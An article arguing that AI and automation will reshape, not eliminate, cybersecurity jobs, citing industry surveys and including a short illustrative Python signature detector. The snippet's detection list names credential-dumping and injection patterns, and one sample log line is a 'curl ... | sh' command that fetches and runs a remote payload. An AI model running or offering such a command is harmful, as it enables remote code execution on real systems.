Addressing the fear of AI in cybersecurity roles


Fear of automation has been present since the first industrial revolution, and as we slowly edge toward its fourth iteration, that same fear has lingered and begun to creep up once more.

Only now it has found a powerful ally that could unearth age-old fears of job loss: artificial intelligence (AI).

With technological advancements making headway every day, there seems to be an accompanying alarm that keeps ringing: a warning of a future in which robots will be able to do everything humans can, only better, cheaper, and for longer.

A study conducted by Trend Micro, a Japan-based cybersecurity firm, which surveyed 500 UK IT decision-makers, found that many IT leaders are concerned their jobs will be replaced by AI within the next ten years.

The study suggests that there is a strongly held belief that jobs within the cybersecurity space will become obsolete due to automation, leaving no need for human involvement.

“More than two-fifths (41 percent) believe that AI will replace their role by 2030, while merely 9 percent of the survey respondents said they were confident that AI would ‘definitely’ not replace their jobs within the next ten years,” the study noted.

While the study highlighted people’s lingering fear of being replaced by a simple algorithm, this doesn’t seem to be the case on the ground.

Let’s jump right in and bust this myth from the get-go.

While IT leaders seem to be worried about the possibility of losing their profession in the next decade, many have jumped in to turn off the panic alarm.

Even Trend Micro’s own Technical Director, Bharat Mistry, wrote within the study that “we need to be realistic about the future. While AI is a useful tool in helping us to defend against threats, its value can only be harnessed in combination with human expertise.”

He added that people should not be worried about their jobs becoming obsolete, since “AI and automation can help us to alleviate the problems caused by critical skills shortages.”

Proponents of AI and automation view them as the harbingers of a golden age free of paper-pushing and mundane, repetitive tasks; even so, AI will not come after your job.

One of the main reasons cybersecurity experts need not fret about their job security is that cyber criminals are beginning to adopt AI within their own arsenal of attacks, transforming the battleground into an online arms race in which attackers and defenders attempt to stay one step ahead of each other.

With that, there needs to be cooperation between humans and their algorithms to fend off bad actors, regardless of how sophisticated their approaches might be.

According to the “2020 SANS Automation and Integration Survey,” cybersecurity teams aren’t going away anytime soon.

“Automation doesn’t appear to negatively affect staffing,” the authors concluded, after surveying more than 200 cybersecurity professionals from companies of all sizes over a wide cross-section of industries.

What they found, in fact, suggested the opposite: Companies with medium or greater levels of automation actually have higher staffing levels than companies with little automation.

While automation could theoretically eliminate almost three million unfilled cybersecurity jobs before a single professional has to contemplate a career change, one also needs to question whether AI and automation will live up to their full potential.

“As we’ve seen with a number of ‘revolutionary’ cybersecurity technologies, many fall short of the hype, at least in the early days,” says a report by U.S. cybersecurity software company McAfee.

Automation and AI currently have shortcomings of their own. The first is that they cannot deploy themselves: a human touch is required to tailor the solution to the business’s needs and to ensure that it is functioning correctly.

Even when they’re put in place correctly, AI and automation cannot be relied on alone to cover an organization’s online security, since without human judgment to filter and investigate every alert, these systems can unearth many false positives.

False negatives are the flip side: AI is great at spotting what it’s programmed to spot, which makes it unreliable at detecting threats and illicit activities it hasn’t been specifically instructed to look for.
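To make that limitation concrete, here is a minimal, hypothetical sketch of a signature-style detector; the signature list and log lines are invented for illustration and do not represent any real product. It flags only the patterns it has been given, so anything outside that list passes through silently until a human adds a new rule.

```python
# Minimal illustration of a signature-based detector: it can only flag
# patterns it already knows about. Signatures and log lines are invented
# for illustration purposes only.

KNOWN_SIGNATURES = {
    "mimikatz": "credential dumping tool",
    "powershell -enc": "encoded PowerShell command",
    "union select": "possible SQL injection",
}

def scan(log_line):
    """Return a description if the line matches a known signature, else None."""
    lowered = log_line.lower()
    for pattern, description in KNOWN_SIGNATURES.items():
        if pattern in lowered:
            return description
    return None  # a novel technique produces no alert at all

if __name__ == "__main__":
    events = [
        "cmd.exe /c powershell -enc SQBFAFgA...",  # caught: matches a known pattern
        "curl http://203.0.113.7/payload | sh",    # missed: no matching rule exists
    ]
    for event in events:
        hit = scan(event)
        if hit:
            print(f"ALERT: {event}  ->  {hit}")
        else:
            print(f"no alert: {event}")
```

The second event goes unflagged not because it is harmless, but because no one has written a rule for it yet, which is exactly the gap human analysts fill.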

“Machine learning is beginning to overcome this hurdle, but the operative word here is still ‘machine’—when significant threats are surfaced, the AI has no way of knowing what this means for the business it’s working for, as it lacks both the context to fully realize what a threat means to its parent company, and the ability to take into consideration everything a person would,” the McAfee report explained.

Humans will still be needed at the helm to analyze risks and potential breaches, and make intuitive, business-critical decisions.

Also, these automated and AI-driven systems instantly become obsolete once new types of attacks are created and deployed against them, since they cannot evolve without the guiding hands of humans.

In parallel, these automated systems cannot hire and train personnel, select vendors, handle compliance, or perform any creative task set before them.

“No automated system, no matter how sophisticated, is going to know when new laws, company regulations, and rules are passed, and no system will be able to adjust to such changes without human intervention,” the report explained.

It is important to note that hackers and cyber criminals have already demonstrated their ability to break into automated systems; if the algorithm is left to fend for itself, without a human quickly responding to the threat, sensitive data could be breached or stolen.

McAfee’s report highlighted that AI and automation will not obliterate cybersecurity roles but will instead redefine and reshape them.

According to SANS, implementation of effective automation often requires an initial surge in staff to get the kinks worked out—but it is almost invariably accompanied by a redirection, not reduction, of the existing workforce.

With that in mind, we need to stop ringing the panic bell of joblessness whenever emerging technologies start hitting the mainstream, and remember that without the guidance and instruction of humans, these technologies cannot perform as well as they were designed to.